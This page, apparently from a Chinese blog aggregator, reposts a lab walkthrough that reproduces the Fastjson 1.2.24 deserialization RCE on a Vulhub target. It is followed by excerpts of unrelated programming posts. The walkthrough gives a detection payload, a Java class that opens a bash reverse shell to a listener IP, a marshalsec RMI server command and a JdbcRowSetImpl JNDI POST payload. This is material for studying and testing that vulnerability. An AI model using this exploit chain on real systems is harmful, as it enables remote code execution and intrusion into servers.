当前位置：首页 > news >正文

【Vulhub】Fastjson 1.2.24_rce复现

news 文章来源：https://blog.csdn.net/woshicainiao666/article/details/139333247 2025/5/8 21:06:22

文章目录

一，Fastjson是什么？
二，fastjson漏洞原理
三，判断是否有fastjson反序列化
四，复现Fastjson 1.2.24_rce(vulhub)
- `环境配置`
- 1.判断是否存在Fastjson反序列化
- 2.反弹shell
- 3.启动RMI服务器
- 4.构造恶意POST请求

一，Fastjson是什么？

Fastjson 是阿里巴巴开发的一款将 json 字符串和 java 对象进行序列化和反序列化的开源 json 解析库。

二，fastjson漏洞原理

fastjson 提供了 autotype 功能，在请求过程中，我们可以在请求包中通过修改@type 的值，来反序列化为指定的类型，而 fastjson 在反序列化过程中会设置和获取类中的属性，如果类中存在恶意方法，就会导致代码执行等这类问题

三，判断是否有fastjson反序列化

正常请求是 get 请求并且没有请求体，可以通过构造错误的 POST 请求，即可查看在返回包中是否有 fastjson 这个字符串来判断

四，复现Fastjson 1.2.24_rce(vulhub)

`环境配置`

fastjson环境配置详细

这里我使用vulhub中的fastjson靶机做复现

在这里插入图片描述

1.判断是否存在Fastjson反序列化

抓包，构造恶意POST请求，先弄一个dnslog，看是否可以接收到请求
在这里插入图片描述

payload:{"lzh":{"@type":"javera.net.Inet4Address","val":"dnslog"}}

发送POST请求包
在这里插入图片描述
看到可以请求成功，说明存在fastjson漏洞

2.反弹shell

写一个反弹shell的java文件

package java_exp;import java.lang.Runtime;
import java.lang.Process;
public class Touchfile {static {try {Runtime rt = Runtime.getRuntime();String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/监听IP地址/8989 0>&1"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e){}}
}

编译Java文件

javac Touchfile.java

在这里插入图片描述
将编译好的class文件，通过xftp移动到vps服务器中，并在当前目录开一个python服务,开启8080端口

3.启动RMI服务器

RMI（远程方法调用）使用 RMI 技术可以使一个 JVM 中的对象，调用另一个 JVM 中的对象方法并获取调用结果。这里的另一个 JVM 可以在同一台计算机也可以是远程计算机。因此，RMI 意味着需要一个 Server 端和一个 Client 端

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://IP:8989/#TouchFile" 6666

ip地址就是你攻击机的IP地址，8989端口是接收Touchfile.class文件，而6666端口是调用RMI服务器的接口

开启监听端口：就是在java文件中写的端口8989端口是监听端口
在这里插入图片描述

4.构造恶意POST请求

POST请求{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://IP地址:6666/Touchfile","autoCommit":true}
}

发送数据包，没有回显说明反弹成功
在这里插入图片描述

【Vulhub】Fastjson 1.2.24_rce复现

文章目录一，Fastjson是什么？二，fastjson漏洞原理三，判断是否有fastjson反序列化四，复现Fastjson 1.2.24_rce(vulhub)环境配置1.判断是否存在Fastjson反序列化2.反弹shell3.启动RMI服务器4.构造恶意POST请求一&#x…...

编程日记 2024/6/2 7:07:47

【iconv】UTF-8字符串转换为UTF-16字符串

使用<iconv.h>来进行字符串编码的转换 #include <iconv.h> #include <iostream> #include <string.h> #include <unistd.h> #include <memory> #include <fcntl.h>// 需要链接iconv库// iconv -l 命令可列出所有支持的格式 // exam…...

编程日记 2024/6/2 7:04:43

AI技术的未来展望：重塑人类社会的智能革命

一、引言随着技术的飞速发展，人工智能（AI）已经不再是科幻小说中的概念，而是成为了我们生活中不可或缺的一部分。从简单的智能助手到复杂的自动化生产线，AI技术正在以前所未有的速度改变着世界。本文将对AI技术的未来…...

编程日记 2024/6/2 7:01:40

掘金AI 商战宝典-系统班：2024掘金AIGC课程（30节视频课）

课程目录 1-第一讲学会向Al提问：万能提问公式_1.mp4 2-第二讲用AI写视频脚本_1.mp4 3-第三讲用AI写视频口播文案_1.mp4 4-第四讲用AI自动做视频（上）_1.mp4 5-第五讲用AI自动做视频（中）_1.mp4 6-第六讲用AI自动做视…...

编程日记 2024/6/2 6:58:36

C# WinForm —— 26 ImageList 介绍

1. 简介图片集合，用于存储图像的资源，并在关联控件中显示出来可以通过索引、键名访问每张图片没有事件 2. 属性属性解释(Name)控件ID，在代码里引用的时候会用到,一般以 imgList 开头ClolorDepth用于呈现图像的颜色数，默…...

编程日记 2024/6/2 6:57:34

Vue：现代前端开发的首选框架-【声明周期钩子详解】

引言 Vue.js 是一个流行的前端框架，它通过组件化的开发方式，让开发者能够构建出高效且可维护的应用程序。在Vue中，生命周期钩子（Lifecycle Hooks）是理解组件行为的关键概念。本文将深入探讨Vue生命周期钩子&#xff0…...

编程日记 2024/6/2 6:56:33

【因果推断python】8_线性回归模型2

目录回归理论非随机数据的回归回归理论我不打算深入研究线性回归是如何构建和估计的。然而，一点点理论将有助于解释它在因果推断中的力量。首先，回归解决了理论上的最佳线性预测问题。令是一个参数向量： 线性回归找到最小化均方误差 (…...

编程日记 2024/6/2 6:55:32

MySQL目录和文件

MySQL目录和文件 bin目录存储一些mysql脚本比如mysqld、mysqld-self等等，用于执行mysql一些操作数据目录 show variables like datadir;--查看数据目录位置每一个数据库都有一个和数据库名相同的文件夹；MySQL5.7开始每创建一个表，在Innod…...

编程日记 2024/6/2 6:54:31

0基础学习Elasticsearch-Quick start

文章目录 1 背景2 前言3 快速部署ES4 快速部署Kibana5 发送请求给ES5.1 打开Kibana控制台5.2 通过REST API发送请求5.3 通过curl发送请求5.4 添加数据5.4.1 添加单个document5.4.2 添加多个document 5.5 搜索数据5.5.1 搜索所有documents5.5.2 match查询 6 总结 1 背景因电商项…...

编程日记 2024/6/2 6:53:30

Centos给普通用户添加sudo命令权限

打开sudoers文件 sudo visudo 修改sudoers文件找到root ALL(ALL) ALL这一行，即如下图标出红线的一行在此行下新增如下内容: lbs为用给予sudo执行权限的用户名 # 执行sudo命令，需要输入命令 lbs ALL(ALL) ALL 或 # 执行sudo命令，…...

编程日记 2024/6/2 6:50:27

编写备份MySQL 脚本

目录环境准备增量备份增量备份和差异备份完整代码如下测试脚本是否正常星期天运行脚本（完全备份） 星期一运备份脚本（增量备份） 星期二备份数据（其他天--增量备份） 星期三备份数据（差异备…...

编程日记 2024/6/2 6:49:26

C语言中的数据类型转换：隐式类型转换与显示类型转换

一. 简介本文简单学习一下，C语言中的数据类型转换。重点学习一下隐式类型转换。二. C语言中的数据类型转换：隐式类型转换与显示类型转换类型转换（TypeCasting）：在C语言中是将一种数据类型值转换为另一种数据类型…...

编程日记 2024/6/2 6:48:24

Android 安卓通过bindService ServiceConnection 没有响应的问题

bindService 失败且 ServiceConnection 没有响应可能由多种原因造成。以下是一些可能的原因和相应的解决方法： Service未正确声明或注册： 如果Service没有在AndroidManifest.xml文件中正确声明或注册，bindService将会失败。解决方法&#xf…...

编程日记 2024/6/2 6:47:23

python切片（彻底解除对切片的曲解)

sequence[start:stop:step] **start： **step为正时默认为0，step为负时默认为-1 stop：_ step为正时默认为结尾结束，step为负时默认为开始位置_ ss=“abcdefg” 以该字符串举例，ss[start:stop:step]的意思是将字符串ss从start开始截取（包括start），截取到stop（不包括sto…...

编程日记 2024/6/2 6:46:22

Java—— StringBuilder 和 StringBuffer

1.介绍由于String的不可更改特性，为了方便字符串的修改，Java中又提供了StringBuilder和Stringbuffer类，这两个类大部分功能是相同的，以下为常用方法： public static void main(String[] args) {StringBuilder sb1 n…...

编程日记 2024/6/2 6:43:19

vs2019 c++20 规范 STL库中关于时间的模板

在学习线程的时候，一些函数会让线程等待或睡眠一段时间。函数形参是时间单位，那么在 c 中是如何记录和表示时间的呢？以下给出模板简图： 谢谢...

编程日记 2024/6/2 6:42:18

激光焊接机作为一种高效、精密的焊接设备

激光焊接机是一种用于材料加工时激光焊接的机器，以下是对其的详细介绍： 1. 定义与别称： 激光焊接机，又常称为激光焊机、镭射焊机，是材料加工激光焊接时用的机器。 2. 工作原理： 激光焊接是利用高能量…...

编程日记 2024/6/2 6:41:17

vite为什么速度快

原因 vite快的原因是因为 vite在开发环境中是使用的 esbuild，esbuild 是 go 写的，go 编译型语言、多线程，nodejs 解释型语言、单线程，并且 vite 使用了原生 esm 导入的，所以快一点，当然，这也…...

编程日记 2024/6/2 6:40:16

Java网络编程(下)

White graces：个人主页 🙉专栏推荐:Java入门知识🙉 🙉 内容推荐:Java网络编程🙉 🐹今日诗词:姑苏城外寒山寺，夜半钟声到客船🐹 ⛳️点赞 ☀️收藏⭐️关注💬卑微小博主…...

编程日记 2024/6/2 6:39:15

安装： 1.1安装依赖： curl https://raw.githubusercontent.com/apache/apisix/master/utils/install-dependencies.sh -sL | bash -1.2 安装 OpenResty yum-config-manager --add-repo https://openresty.org/package/centos/openresty.reposudo yum i…...

编程日记 2024/6/2 6:37:13

AI技术：探索未来智能的无限可能

随着科技的飞速发展，人工智能（AI）技术已经成为我们这个时代最引人瞩目的科技力量。从简单的自动化任务到复杂的决策支持系统，AI技术正在以前所未有的速度改变着我们的世界。本文将深入探讨AI技术的定义、发展历程、当前应用、面临…...

编程日记 2024/6/2 6:36:11

npm install 出错，按照版本不匹配解决

一、现象 npm install npm WARN config global --global, --local are deprecated. Use --locationglobal instead. npm ERR! code ERESOLVE npm ERR! ERESOLVE unable to resolve dependency tree npm ERR! npm ERR! While resolving: panshi-main-web0.1.0 npm ERR! Found…...

编程日记 2024/6/2 6:35:10